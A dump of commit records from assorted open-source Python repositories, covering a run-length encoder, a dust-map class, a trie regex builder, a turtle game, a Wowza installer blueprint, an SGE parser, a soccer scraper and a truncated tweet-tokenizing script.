assert expected in actual, actual
def test_twitter_proxy():
expected = "<b>Twitter</b> has not joined"
actual = serve_request('/on/twitter/twitter/').body
assert expected in actual, actual
| cc0-1.0 | Python |
|
7a5b46d5a9d0e45b928bcadfeb91a6285868d8f3 | Create medium_RunLength.py | GabrielGhe/CoderbyteChallenges,GabrielGhe/CoderbyteChallenges | medium_RunLength.py | medium_RunLength.py | """
Determine the run length
of a string
ex: aaabbrerr > 3a2b1r1e2r
"""
def RunLength(string):
val = string[0]
count = 1
ret = ""
for char in string[1:]:
if char != val:
ret += str(count)
ret += val
val = char
count = 1
else:
count += 1
ret += str(count)
ret += val
return ret
# keep this function call here
# to see how to enter arguments in Python scroll down
print RunLength(raw_input())
| mit | Python |
|
f3c8117755537ca96c3c8c72d5f54b8c244c260b | add top-level class | jobovy/mwdust,jobovy/mwdust | mwdust/DustMap3D.py | mwdust/DustMap3D.py | ###############################################################################
#
# DustMap3D: top-level class for a 3D dust map; all other dust maps inherit
# from this
#
###############################################################################
class DustMap3D:
"""top-level class for a 3D dust map; all other dust maps inherit from this"""
def __init__(self):
"""
NAME:
__init__
PURPOSE:
Initialize the dust map
INPUT:
OUTPUT:
HISTORY:
2013-11-24 - Started - Bovy (IAS)
"""
return None
def __call__(self,*args,**kwargs):
"""
NAME:
__call__
PURPOSE:
evaluate the dust map
INPUT:
OUTPUT:
HISTORY:
2013-11-24 - Started - Bovy (IAS)
"""
raise NotImplementedError("'__call__' for this DustMap3D not implemented yet")
| bsd-3-clause | Python |
|
20cebf2b93a310dac4c491b5a59f1a2846f51073 | Add basic implementation | ZhukovAlexander/triegex | triegex/__init__.py | triegex/__init__.py | __all__ = ('Triegex',)
class TriegexNode:
def __init__(self, char: str, childrens=()):
self.char = char
self.childrens = {children.char: children for children in childrens}
def render(self):
if not self.childrens:
return self.char
return self.char + r'(?:{0})'.format(
r'|'.join(
[children.render() for key, children in sorted(self.childrens.items())]
)
)
class Triegex:
def __init__(self, *words):
self._root = TriegexNode('')
for word in words:
self.add(word)
def add(self, word: str):
current = self._root
for letter in word:
current = current.childrens.setdefault(letter, TriegexNode(letter))
def render(self):
return self._root.render()
def __iter__(self):
return self
if __name__ == '__main__':
triegex = Triegex('spam', 'eggs')
triegex.add('foo')
triegex.add('bar')
triegex.add('baz')
print(triegex.render())
import re
print(re.findall(triegex.render(), 'baz spam eggs')) | mit | Python |
|
a4ba072e7a136fe1ebb813a1592bf5c378fd855b | 优化了乌龟吃鱼游戏” | Zhaominxin/MyProject,Zhaominxin/MyProject | turtle_fish_game.py | turtle_fish_game.py | import random
class Turtle:
energy = 50
x = random.randint(0, 10)
y = random.randint(0, 10)
def __init__(self, name):
self.name = name
def moving(self):
move = random.choice([-2,-1,1,2])
direction = random.choice(['x','y'])
print('Turtle{0} move {1}, on {2}'.format(self.name, move, direction))
if direction == 'x':
position = self.x + move
if 0 <= position <= 10:
self.x += move
elif position < 0:
self.x = - (self.x + move)
elif position > 10:
self.x = 10 + (10 - (self.x + move))
if direction == 'y':
position = self.y + move
if 0 <= position <= 10:
self.y += move
elif position < 0:
self.y = - (self.y + move)
elif position > 10:
self.y = 10 + (10 - (self.y + move))
self.energy -= 1
print('Turtle{0} Position: x={1}, y={2}, energy={3}, '.format(self.name,self.x, self.y, self.energy))
class Fish:
x = random.randint(0, 10)
y = random.randint(0, 10)
def __init__(self, name):
self.name = name
def moving(self):
move = random.choice([-1, 1])
direction = random.choice(['x','y'])
if direction == 'x':
position = self.x + move
if 0 <= position <= 10:
self.x += move
elif position < 0:
self.x = - (self.x + move)
elif position > 10:
self.x = 10 + (10 - (self.x + move))
if direction == 'y':
position = self.y + move
if 1 <= position <= 10:
self.y += move
elif position < 0:
self.y = - (self.y + move)
elif position > 10:
self.y = 10 + (10 - (self.y + move))
print('Fish{0} Position: x={1}, y={2}'.format(self.name, self.x, self.y))
class Pool:
def __init__(self, turtle_num=2, fish_num=10):
self.turtle_num = turtle_num
self.fish_num = fish_num
self.turtle_list = []
for i in range(self.turtle_num):
self.turtle_list.append(Turtle(str(i+1)))
self.fish_list = []
for i in range(self.fish_num):
self.fish_list.append(Fish(str(i+1)))
pool = Pool(3,10)
while len(pool.turtle_list) > 0 and len(pool.fish_list) > 0:
for each in pool.turtle_list:
if each.energy > 0:
each.moving()
else:
pool.turtle_list.remove(each)
print('Turtle{0} have no energy!!!!'.format(each.name))
for eachfish in pool.fish_list:
eachfish.moving()
for eachturtle in pool.turtle_list:
if eachfish.x == eachturtle.x and eachfish.y == eachturtle.y:
print('Turtle{0} catch Fish{1}!! It get 20 energy!!!'.format(eachturtle.name,eachfish.name))
eachturtle.energy += 20
pool.fish_list.remove(eachfish)
if len(pool.fish_list) == 0:
print('There is no fish!! Game Over!!')
if len(pool.turtle_list) == 0:
print('The turtles have no energy!! Game Over!!!')
#日志:
#6月写的L37_t1_turtle.py.作业里,乌龟和10个fish的类对象都是手动建立的。
#10月改进时增加的池子类,可以将乌龟和鱼的初始化在建立池对象的同时完成,
#而在池子里发生的事件不需要对象的名称,所以不用纠结变量名的可视化,
#把对象放进列表里迭代即可
| mit | Python |
|
465956eb780ace1835e08ca2c87895d7ff1326cf | save a legacy script, may have to use again some year | akrherz/pyWWA,akrherz/pyWWA | util/wisc_ingest.py | util/wisc_ingest.py | import subprocess
import os
import glob
import mx.DateTime
sts = mx.DateTime.DateTime(2011,12,1)
ets = mx.DateTime.DateTime(2012,1,1)
WANT = ['EAST-CONUS','NHEM-COMP','SUPER-NATIONAL','NHEM-MULTICOMP','WEST-CONUS']
def dodate(now, dir):
base = now.strftime("/mesonet/gini/%Y_%m_%d/sat/"+dir)
for (d2,bogus,files) in os.walk(base):
if len(files) == 0:
continue
for file in files:
cmd = "cat %s/%s | /usr/bin/python gini2gis.py" % (d2, file)
print cmd
subprocess.call(cmd, shell=True)
now = sts
while now < ets:
for dir in WANT:
dodate(now, dir)
now += mx.DateTime.RelativeDateTime(days=1)
| mit | Python |
|
099151db3a18384ebb4b7abc17c1a38567e5d2cb | add crash scan for reporting | Mozilla-TWQA/mtbf_operation,zapion/mtbf_operation,ShakoHo/mtbf_operation | utils/crash_scan.py | utils/crash_scan.py | #!/usr/bin/python
import subprocess
import re
import os
p = subprocess.Popen(['adb', 'devices'], stdout=subprocess.PIPE)
res = p.communicate()[0].split('\n')
res.pop(0)
devices = []
for li in res:
m = re.search('(\w+)', li)
if(m is not None):
devices.append(m.group(0))
total_crash_num = 0
crash_stat_url = 'https://crash-stats.mozilla.com/report/index/'
for dev in devices:
os.environ['ANDROID_SERIAL'] = dev
crash_num = 0
base_dir = "/data/b2g/mozilla/Crash Reports/"
scan_cmd = ['adb', 'shell', 'ls -l']
submit_dir = base_dir + 'submitted'
pending_dir = base_dir + 'pending'
p = subprocess.Popen(scan_cmd + [submit_dir], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
output = p.communicate()[0]
crash_id = []
if "No such" not in output:
for out in output.split('\n'):
if out.strip() != "":
cid = re.search('\sbp-(\S+)\.txt$', out.strip()).group(1)
crash_id.append(cid)
crash_num += 1
q = subprocess.Popen(scan_cmd + [pending_dir], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
output = q.communicate()[0]
if "No such" not in output:
for out in output.split('\n'):
if out.strip() != "":
crash_num += 1
print("device " + dev + " has " + str(crash_num) + " crashes.")
total_crash_num += crash_num
if crash_id:
print("Submitted: ")
for cid in crash_id:
print(crash_stat_url + cid)
print("Total crash number = " + str(total_crash_num))
| mpl-2.0 | Python |
|
9ddb89b4b652fb3026632ffd79dea9321f58cc31 | bump version in __init__.py | 1flow/1flow,1flow/1flow,WillianPaiva/1flow,WillianPaiva/1flow,1flow/1flow,WillianPaiva/1flow,1flow/1flow,WillianPaiva/1flow,1flow/1flow,WillianPaiva/1flow | oneflow/__init__.py | oneflow/__init__.py |
VERSION = '0.16.4'
|
VERSION = '0.16.3.1'
| agpl-3.0 | Python |
9d994180a38976939e5da1757303ef8ed76f5e07 | bump version in __init__.py | WillianPaiva/1flow,1flow/1flow,1flow/1flow,1flow/1flow,1flow/1flow,1flow/1flow,WillianPaiva/1flow,WillianPaiva/1flow,WillianPaiva/1flow,WillianPaiva/1flow | oneflow/__init__.py | oneflow/__init__.py |
VERSION = '0.19.1'
|
VERSION = '0.19'
| agpl-3.0 | Python |
aaca641f968bf12eb2177460f8cf809d62ea3bd4 | Add a strict version of itertools.groupby | lamby/buildinfo.debian.net,lamby/buildinfo.debian.net | bidb/utils/itertools.py | bidb/utils/itertools.py | from __future__ import absolute_import
import itertools
def groupby(iterable, keyfunc, sortfunc=lambda x: x):
return [
(x, list(sorted(y, key=sortfunc)))
for x, y in itertools.groupby(iterable, keyfunc)
]
| agpl-3.0 | Python |
|
d2c414576cfcf935ed36ffe2c5fb594911be0832 | work on sge module started | sfranky/qtop,fgeorgatos/qtop,sfranky/qtop,qtop/qtop,qtop/qtop,fgeorgatos/qtop,fgeorgatos/qtop,qtop/qtop | sge.py | sge.py | from collections import OrderedDict
__author__ = 'sfranky'
from lxml import etree
fn = '/home/sfranky/PycharmProjects/results/gef_sge1/qstat.F.xml.stdout'
tree = etree.parse(fn)
root = tree.getroot()
def extract_job_info(elem, elem_text):
"""
inside elem, iterates over subelems named elem_text and extracts relevant job information
"""
jobs = []
for subelem in elem.iter(elem_text):
job = dict()
job['job_state'] = subelem.find('./state').text
job['job_name'] = subelem.find('./JB_name').text
job['job_owner'] = subelem.find('./JB_owner').text
job['job_slots'] = subelem.find('./slots').text
job['job_nr'] = subelem.find('./JB_job_number').text
jobs.append(job)
# print '\t' + job['job_state'], job['job_name'], job['job_owner'], job['job_slots'], job['job_nr']
return jobs
worker_nodes = list()
for queue_elem in root.iter('Queue-List'):
d = OrderedDict()
queue_name = queue_elem.find('./resource[@name="qname"]').text
d['domainname'] = host_name = queue_elem.find('./resource[@name="hostname"]').text
slots_total = queue_elem.find('./slots_total').text
d['np'] = queue_elem.find('./resource[@name="num_proc"]').text
slots_used = queue_elem.find('./slots_used').text
slots_resv = queue_elem.find('./slots_resv').text
# print queue_name, host_name, slots_total, slots_used, slots_resv
running_jobs = extract_job_info(queue_elem, 'job_list')
d['core_job_map'] = [{'core': idx, 'job': job['job_nr']} for idx, job in enumerate(running_jobs)]
worker_nodes.append(d)
job_info_elem = root.find('./job_info')
# print 'PENDING JOBS'
pending_jobs = extract_job_info(job_info_elem, 'job_list')
| mit | Python |
|
482a2639911b676bf68dcd529dcc1ffecaaf10ea | Create shortner.py | WebShark025/ZigZag-v2,WebShark025/ZigZag-v2,WebShark025/ZigZag-v2 | plugins/shortner.py | plugins/shortner.py | mit | Python |
||
5ae58621bd766aeaa6f1838397b045039568887c | Add driver to find plate solutions | dkirkby/babeldix | platesolve.py | platesolve.py | import babeldix
import sys
import operator
# Print solutions in order of increasing score
for plate in sys.argv[1:]:
solns = babeldix.Plates.get_solutions(plate)
for (soln,score) in sorted(solns.items(), key=operator.itemgetter(1)):
print '{0:s} {1:d} {2:s}'.format(plate,score,soln)
| mit | Python |
|
c1bfe92878edc3f9598a6d97046775cb8d9b0aa0 | Make migration for item-visibility change | verleihtool/verleihtool,verleihtool/verleihtool,verleihtool/verleihtool,verleihtool/verleihtool | depot/migrations/0009_auto_20170330_1342.py | depot/migrations/0009_auto_20170330_1342.py | # -*- coding: utf-8 -*-
# Generated by Django 1.10.6 on 2017-03-30 13:42
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('depot', '0008_auto_20170330_0855'),
]
operations = [
migrations.AlterField(
model_name='item',
name='visibility',
field=models.CharField(choices=[('1', 'public'), ('2', 'private'), ('3', 'deleted')], max_length=1),
),
]
| agpl-3.0 | Python |
|
03ecddce6f34d04957ca5161eb7d776daf02ed47 | Add blobdb messages | pebble/libpebble2 | protocol/blobdb.py | protocol/blobdb.py | __author__ = 'katharine'
from base import PebblePacket
from base.types import *
class InsertCommand(PebblePacket):
key_size = Uint8()
key = BinaryArray(length=key_size)
value_size = Uint16()
value = BinaryArray(length=value_size)
class DeleteCommand(PebblePacket):
key_size = Uint8()
key = BinaryArray(length=key_size)
class ClearCommand(PebblePacket):
pass
class BlobCommand(PebblePacket):
command = Uint8()
token = Uint16()
database = Uint8()
content = Union(command, {
0x01: InsertCommand,
0x04: DeleteCommand,
0x05: ClearCommand,
})
| mit | Python |
|
cf0310a7111bdb79b4bbe2a52095c8344778c80c | Add admin.py for protocols | Hackfmi/Diaphanum,Hackfmi/Diaphanum | protocols/admin.py | protocols/admin.py | from django.contrib import admin
from .models import Protocol
admin.site.register(Protocol) | mit | Python |
|
98ed7f3f682bf1ba23bb0030aa81e8fff23e54ad | Add harvester | erinspace/scrapi,fabianvf/scrapi,felliott/scrapi,CenterForOpenScience/scrapi,fabianvf/scrapi,felliott/scrapi,erinspace/scrapi,CenterForOpenScience/scrapi | scrapi/harvesters/uow.py | scrapi/harvesters/uow.py | '''
Harvester for the Research Online for the SHARE project
Example API call: http://ro.uow.edu.au/do/oai/?verb=ListRecords&metadataPrefix=oai_dc
'''
from __future__ import unicode_literals
from scrapi.base import OAIHarvester
class UowHarvester(OAIHarvester):
short_name = 'uow'
long_name = 'University of Wollongong Research Online'
url = 'http://ro.uow.edu.au'
base_url = 'http://ro.uow.edu.au/do/oai/'
property_list = ['date', 'source', 'identifier', 'type', 'format', 'setSpec']
timezone_granularity = True
| apache-2.0 | Python |
|
1b4ca9e9afccfc1492aeea955f2cd3c783f1dc80 | Create file_parser.py | armatita/NCparser | file_parser.py | file_parser.py | # -*- coding: utf-8 -*-
"""
Created on Thu Mar 19 17:03:35 2015
@author: pedro.correia
"""
from __future__ import division # Just making sure that correct integer division is working
import numpy as np # This is numpy,python numerical library
import xlrd as xcl # This library allow you to manipulate (read and write) excel files
import cPickle as pickle # Library used to save and load dictionaries
import objects_parser as obj # Our local objects library.
def __open_excel_book__(path):
"""
NOTE: internal function. Use open_excel_file function.
User gives a string path and this function returns the open excel book.
"""
book = xcl.open_workbook(path,on_demand=True)
return book
def __array_by_type__(sheet,col,null=-999):
"""
NOTE: internal function. Use open_excel_file function.
This function receives sheet and column number and returns an array with the
correct type. The null is by default -999 but you can change it on the third
argument.
"""
try:
float(sheet.cell_value(1, col))
return np.zeros(sheet.nrows,dtype=type(sheet.cell_value(1, col))),null
except ValueError:
return np.zeros(sheet.nrows,dtype='|S15'),str(null) #type(sheet.cell_value(1, col))),str(null)
def __build_excel_dictionary__(book,null=-999):
"""
NOTE: internal function. Use open_excel_file function.
Function that receives an excel book (see: __open_excel_book__) and extracts to
dictionaries (with numpy arrays) all information from the excel book. Empty
cells are given the null value (default is -999).
"""
sheet_dictionary = {}
for name in book.sheet_names():
sheet = book.sheet_by_name(name)
local_dictionary = {}
for col in xrange(sheet.ncols):
local_array,null = __array_by_type__(sheet,col,null)
for row in xrange(1,sheet.nrows):
if sheet.cell_type(row, col) in (xcl.XL_CELL_EMPTY, xcl.XL_CELL_BLANK):
local_array[row] = null
else:
local_array[row] = sheet.cell_value(row, col)
local_dictionary[sheet.cell_value(0, col)] = local_array
sheet_dictionary[name] = local_dictionary
return sheet_dictionary
def open_excel_file(path,null=-999):
"""
Function that opens excel file into a excel_class_object and return the
last.
"""
book = __open_excel_book__(path)
data = obj.excelObject(__build_excel_dictionary__(book,null),null)
return data
def save_excel_object(path,obj):
"""
Saves excel object to file. Give path and excel object.
"""
with open(path, 'wb') as outfile:
pickle.dump(obj.me, outfile, protocol=pickle.HIGHEST_PROTOCOL)
def open_excel_object(path,null=-999):
"""
Creates an excel object from epy (pickle) loaded file.
"""
return obj.excelObject(pickle.load(open(path, "rb" )),null)
| mit | Python |
|
26d364765cdb0e4e4bf755286d92c305b8dabb0c | Add files via upload | mzoorob/LAPOP-Projects,mzoorob/LAPOP-Projects | find_qCodes.py | find_qCodes.py | __author__ = 'zoorobmj'
import re
import csv
import os
if __name__ == '__main__':
folder = "C:\Users\zoorobmj\PycharmProjects\Question_Matrix" # my directory
files = [f for f in os.listdir(folder) if f.endswith('.txt')]
q_list = []
for f in folder:
Qs = open('CoreESP2016.txt', 'r').read()
# print Qs
# find all meeting this pattern
# get unique values
# return as csv
q_codes = re.findall(r"[A-Z]+[A-Z0-9]*[.]", Qs)
q_list.append(q_codes)
with open("CoreESP2016.csv", 'wb') as output:
writer = csv.writer(output, lineterminator='\n')
for val in q_list:
if len(val)==2:
print val
else:
writer.writerow([val]) | cc0-1.0 | Python |
|
5ae45bfbbd6559d344eb641853ef8e83b3ff1c90 | Add wowza blueprint | chrippa/blues,5monkeys/blues,Sportamore/blues,adisbladis/blues,Sportamore/blues,andreif/blues,adisbladis/blues,5monkeys/blues,andreif/blues,andreif/blues,5monkeys/blues,adisbladis/blues,Sportamore/blues,chrippa/blues,chrippa/blues | blues/wowza.py | blues/wowza.py | """
Wowza Blueprint
===============
**Fabric environment:**
.. code-block:: yaml
blueprints:
- blues.wowza
"""
from fabric.decorators import task
from refabric.api import run, info
from refabric.context_managers import sudo
from refabric.contrib import blueprints
from . import debian
__all__ = ['start', 'stop', 'restart', 'setup', 'configure']
blueprint = blueprints.get(__name__)
start = debian.service_task('WowzaStreamingEngine', 'start')
stop = debian.service_task('WowzaStreamingEngine', 'stop')
restart = debian.service_task('WowzaStreamingEngine', 'restart')
wowza_root ='/usr/local/WowzaMediaServer/'
@task
def setup():
"""
Install and configure Wowza
"""
install()
configure()
def install():
with sudo():
info('Downloading wowza')
version = blueprint.get('wowza_version', '4.1.2')
binary = 'WowzaStreamingEngine-{}.deb.bin'.format(version)
version_path = version.replace('.', '-')
url = 'http://www.wowza.com/downloads/WowzaStreamingEngine-{}/{}'.format(version_path,
binary)
run('wget -P /tmp/ {url}'.format(url=url))
debian.chmod('/tmp/{}'.format(binary), '+x')
info('Installing wowza')
run('/tmp/{}'.format(binary))
@task
def configure():
"""
Configure Wowza
"""
| mit | Python |
|
0e53f398bf2cf885393865ec1f899308bb56625b | Add a low-level example for creating views. | mistermocha/jenkinsapi,imsardine/jenkinsapi,mistermocha/jenkinsapi,JohnLZeller/jenkinsapi,JohnLZeller/jenkinsapi,aerickson/jenkinsapi,zaro0508/jenkinsapi,imsardine/jenkinsapi,zaro0508/jenkinsapi,jduan/jenkinsapi,domenkozar/jenkinsapi,mistermocha/jenkinsapi,jduan/jenkinsapi,salimfadhley/jenkinsapi,salimfadhley/jenkinsapi,aerickson/jenkinsapi,JohnLZeller/jenkinsapi,domenkozar/jenkinsapi,imsardine/jenkinsapi,zaro0508/jenkinsapi | examples/create_a_view_low_level.py | examples/create_a_view_low_level.py | """
A low level example:
This is how JenkinsAPI creates views
"""
import requests
import json
url = 'http://localhost:8080/newView'
str_view_name = "ddsfddfd"
params = {}# {'name': str_view_name}
headers = {'Content-Type': 'application/x-www-form-urlencoded'}
data = {
"mode": "hudson.model.ListView",
#"Submit": "OK",
"name": str_view_name
}
# Try 1
result = requests.post(url, params=params, data={'json':json.dumps(data)}, headers=headers)
print result.text.encode('UTF-8')
| mit | Python |
|
4c73cad398d5dac85b264187f709a860f356b311 | Add new file with mixin for mysql | KSchopmeyer/smipyping,KSchopmeyer/smipyping,KSchopmeyer/smipyping,KSchopmeyer/smipyping,KSchopmeyer/smipyping | smipyping/_mysqldbmixin.py | smipyping/_mysqldbmixin.py | #!/usr/bin/env python
# (C) Copyright 2017 Inova Development Inc.
# All Rights Reserved
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function, absolute_import
from mysql.connector import MySQLConnection
class MySQLDBMixin(object):
"""
Provides some common methods to mixin in with the MySQL...Tables
classes
"""
def connectdb(self, db_dict, verbose):
"""Connect the db"""
try:
connection = MySQLConnection(host=db_dict['host'],
database=db_dict['database'],
user=db_dict['user'],
password=db_dict['password'])
if connection.is_connected():
self.connection = connection
if verbose:
print('sql db connection established. host %s, db %s' %
(db_dict['host'], db_dict['database']))
else:
print('SQL database connection failed. host %s, db %s' %
(db_dict['host'], db_dict['database']))
raise ValueError('Connection to database failed')
except Exception as ex:
raise ValueError('Could not connect to sql database %r. '
' Exception: %r'
% (db_dict, ex))
def _load_table(self):
"""
Load the internal dictionary from the database based on the
fields definition
"""
try:
cursor = self.connection.cursor(dictionary=True)
fields = ', '.join(self.fields)
sql = 'SELECT %s FROM %s' % (fields, self.table_name)
cursor.execute(sql)
rows = cursor.fetchall()
for row in rows:
key = row[self.key_field]
self.data_dict[key] = row
except Exception as ex:
raise ValueError('Error: setup sql based targets table %r. '
'Exception: %r'
% (self.db_dict, ex))
| mit | Python |
|
206c99420101655d7495000d659d571ef729300b | Add areas spider | tvl/scrapy-soccerway | soccerway/spiders/areas.py | soccerway/spiders/areas.py | # -*- coding: utf-8 -*-
import scrapy
from soccerway.items import Match
from urllib.parse import urlencode
class AreasSpider(scrapy.Spider):
name = "areas"
allowed_domains = ["http://www.soccerway.mobi"]
start_urls = ['http://www.soccerway.mobi/?']
params = {
"sport": "soccer",
"page": "leagues",
"view" : "by_area",
"area_id" : "212",
"localization_id": "www"
}
def start_requests(self):
for i in range(8,11):
self.params['area_id'] = str(i)
request = scrapy.Request(url=self.start_urls[0]+urlencode(self.params), callback=self.parse)
request.meta['proxy'] = 'http://127.0.0.1:8118'
yield request
def parse(self, response):
self.log('URL: {}'.format(response.url))
"""
def parse(self, response):
venue = Venue()
venue['country'], venue['city'], venue['name'] = response.css('title::text')[0].extract().split(',')
res = response.xpath('//td//b/text()')
if len(res) > 0:
venue['opened'] = res[0].extract()
res = response.xpath('//td//b/text()')
if len(res) > 1:
venue['capacity'] = res[1].extract()
venue['lat'], venue['lng'] = response.xpath('//script/text()')[1].re(r'\((.*)\)')[1].split(',')
return venue
"""
| apache-2.0 | Python |
|
171de05d8ea4a31b0f97c38206b44826364d7693 | Add http_status.py | cortesi/mitmproxy,vhaupert/mitmproxy,ParthGanatra/mitmproxy,pombredanne/netlib,ddworken/mitmproxy,MatthewShao/mitmproxy,xaxa89/mitmproxy,ujjwal96/mitmproxy,jvillacorta/mitmproxy,mitmproxy/mitmproxy,mosajjal/mitmproxy,xaxa89/mitmproxy,ParthGanatra/mitmproxy,mitmproxy/mitmproxy,gzzhanghao/mitmproxy,ddworken/mitmproxy,mosajjal/mitmproxy,ddworken/mitmproxy,vhaupert/mitmproxy,gzzhanghao/mitmproxy,pombredanne/netlib,jvillacorta/mitmproxy,gzzhanghao/mitmproxy,fimad/mitmproxy,Kriechi/mitmproxy,cortesi/mitmproxy,xaxa89/mitmproxy,mhils/mitmproxy,fimad/mitmproxy,StevenVanAcker/mitmproxy,dufferzafar/mitmproxy,ujjwal96/mitmproxy,cortesi/mitmproxy,fimad/mitmproxy,akihikodaki/netlib,Kriechi/mitmproxy,dwfreed/mitmproxy,Kriechi/mitmproxy,mhils/mitmproxy,Kriechi/netlib,ikoz/mitmproxy,ujjwal96/mitmproxy,mitmproxy/mitmproxy,mhils/mitmproxy,ParthGanatra/mitmproxy,ParthGanatra/mitmproxy,akihikodaki/netlib,mitmproxy/mitmproxy,zlorb/mitmproxy,StevenVanAcker/mitmproxy,dufferzafar/mitmproxy,dufferzafar/mitmproxy,dufferzafar/mitmproxy,laurmurclar/mitmproxy,gzzhanghao/mitmproxy,ikoz/mitmproxy,tdickers/mitmproxy,zlorb/mitmproxy,ikoz/mitmproxy,mitmproxy/netlib,mhils/mitmproxy,tdickers/mitmproxy,mitmproxy/mitmproxy,dwfreed/mitmproxy,vhaupert/mitmproxy,laurmurclar/mitmproxy,vhaupert/mitmproxy,ddworken/mitmproxy,cortesi/mitmproxy,tdickers/mitmproxy,ikoz/mitmproxy,MatthewShao/mitmproxy,mosajjal/mitmproxy,MatthewShao/mitmproxy,zlorb/mitmproxy,StevenVanAcker/mitmproxy,Kriechi/mitmproxy,laurmurclar/mitmproxy,dwfreed/mitmproxy,jvillacorta/mitmproxy,mhils/mitmproxy,StevenVanAcker/mitmproxy,dwfreed/mitmproxy,xaxa89/mitmproxy,Kriechi/netlib,jvillacorta/mitmproxy,zlorb/mitmproxy,tdickers/mitmproxy,MatthewShao/mitmproxy,fimad/mitmproxy,ujjwal96/mitmproxy,laurmurclar/mitmproxy,mosajjal/mitmproxy | netlib/http_status.py | netlib/http_status.py |
CONTINUE = 100
SWITCHING = 101
OK = 200
CREATED = 201
ACCEPTED = 202
NON_AUTHORITATIVE_INFORMATION = 203
NO_CONTENT = 204
RESET_CONTENT = 205
PARTIAL_CONTENT = 206
MULTI_STATUS = 207
MULTIPLE_CHOICE = 300
MOVED_PERMANENTLY = 301
FOUND = 302
SEE_OTHER = 303
NOT_MODIFIED = 304
USE_PROXY = 305
TEMPORARY_REDIRECT = 307
BAD_REQUEST = 400
UNAUTHORIZED = 401
PAYMENT_REQUIRED = 402
FORBIDDEN = 403
NOT_FOUND = 404
NOT_ALLOWED = 405
NOT_ACCEPTABLE = 406
PROXY_AUTH_REQUIRED = 407
REQUEST_TIMEOUT = 408
CONFLICT = 409
GONE = 410
LENGTH_REQUIRED = 411
PRECONDITION_FAILED = 412
REQUEST_ENTITY_TOO_LARGE = 413
REQUEST_URI_TOO_LONG = 414
UNSUPPORTED_MEDIA_TYPE = 415
REQUESTED_RANGE_NOT_SATISFIABLE = 416
EXPECTATION_FAILED = 417
INTERNAL_SERVER_ERROR = 500
NOT_IMPLEMENTED = 501
BAD_GATEWAY = 502
SERVICE_UNAVAILABLE = 503
GATEWAY_TIMEOUT = 504
HTTP_VERSION_NOT_SUPPORTED = 505
INSUFFICIENT_STORAGE_SPACE = 507
NOT_EXTENDED = 510
RESPONSES = {
# 100
CONTINUE: "Continue",
SWITCHING: "Switching Protocols",
# 200
OK: "OK",
CREATED: "Created",
ACCEPTED: "Accepted",
NON_AUTHORITATIVE_INFORMATION: "Non-Authoritative Information",
NO_CONTENT: "No Content",
RESET_CONTENT: "Reset Content.",
PARTIAL_CONTENT: "Partial Content",
MULTI_STATUS: "Multi-Status",
# 300
MULTIPLE_CHOICE: "Multiple Choices",
MOVED_PERMANENTLY: "Moved Permanently",
FOUND: "Found",
SEE_OTHER: "See Other",
NOT_MODIFIED: "Not Modified",
USE_PROXY: "Use Proxy",
# 306 not defined??
TEMPORARY_REDIRECT: "Temporary Redirect",
# 400
BAD_REQUEST: "Bad Request",
UNAUTHORIZED: "Unauthorized",
PAYMENT_REQUIRED: "Payment Required",
FORBIDDEN: "Forbidden",
NOT_FOUND: "Not Found",
NOT_ALLOWED: "Method Not Allowed",
NOT_ACCEPTABLE: "Not Acceptable",
PROXY_AUTH_REQUIRED: "Proxy Authentication Required",
REQUEST_TIMEOUT: "Request Time-out",
CONFLICT: "Conflict",
GONE: "Gone",
LENGTH_REQUIRED: "Length Required",
PRECONDITION_FAILED: "Precondition Failed",
REQUEST_ENTITY_TOO_LARGE: "Request Entity Too Large",
REQUEST_URI_TOO_LONG: "Request-URI Too Long",
UNSUPPORTED_MEDIA_TYPE: "Unsupported Media Type",
REQUESTED_RANGE_NOT_SATISFIABLE: "Requested Range not satisfiable",
EXPECTATION_FAILED: "Expectation Failed",
# 500
INTERNAL_SERVER_ERROR: "Internal Server Error",
NOT_IMPLEMENTED: "Not Implemented",
BAD_GATEWAY: "Bad Gateway",
SERVICE_UNAVAILABLE: "Service Unavailable",
GATEWAY_TIMEOUT: "Gateway Time-out",
HTTP_VERSION_NOT_SUPPORTED: "HTTP Version not supported",
INSUFFICIENT_STORAGE_SPACE: "Insufficient Storage Space",
NOT_EXTENDED: "Not Extended"
}
| mit | Python |
|
e7a2ec9b38b69a852667cca8d5c7da3ff242ce61 | Add processTweets.py | traxex33/Twitter-Analysis | processTweets.py | processTweets.py | import json
import re
import operator
import string
import collections
from collections import Counter
from nltk.corpus import stopwords
from nltk.tokenize import word_tokenize
#Setup regex to ingore emoticons
emoticons_str = r"""
(?:
[:=;] Eyes
[oO\-]? # Nose (optional)
[D\)\]\(\]/\\OpP] # Mouth
)"""
#Setup regex to split mentions, hashtags, urls, etc. together
regex_str = [
emoticons_str,
r'<[^>]+>', #HTML tags
r'(?:@[\w_]+)', #@-mentions
r"(?:\#+[\w_]+[\w\'_\-]*[\w_]+)", #hashtags
r'http[s]?://(?:[a-z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-f][0-9a-f]))+', # URLs
r'(?:(?:\d+,?)+(?:\.?\d+)?)', #numbers
r"(?:[a-z][a-z'\-_]+[a-z])", #words with - and '
r'(?:[\w_]+)', #other words
r'(?:\S)' #anything else
]
tokens_re = re.compile(r'('+'|'.join(regex_str)+')', re.VERBOSE | re.IGNORECASE)
emoticon_re = re.compile(r'^'+emoticons_str+'$', re.VERBOSE | re.IGNORECASE)
def tokenize(s):
return tokens_re.findall(s)
def preprocess(s, lowercase=False):
tokens = tokenize(s)
if lowercase:
tokens = [token if emoticon_re.search(token) else token.lower() for token in tokens]
for token in tokens:
token = token.encode('utf-8')
return tokens
punctuation = list(string.punctuation)
others = ['RT', 'via', u'\u2026', 'The', u'\u2019', 'amp']
stop = stopwords.words('english') + punctuation + others
#Find most common words
def terms_only(fname, number):
with open(fname, 'r') as f:
count_all = Counter()
for line in f:
tweet = json.loads(line)
terms_stop = [term for term in preprocess(tweet['text'])
if term not in stop and not term.startswith(('#', '@'))]
count_all.update(terms_stop)
print(count_all.most_common(number))
#Find most common hashtags
def hash_only(fname, number):
with open(fname, 'r') as f:
count_all = Counter()
for line in f:
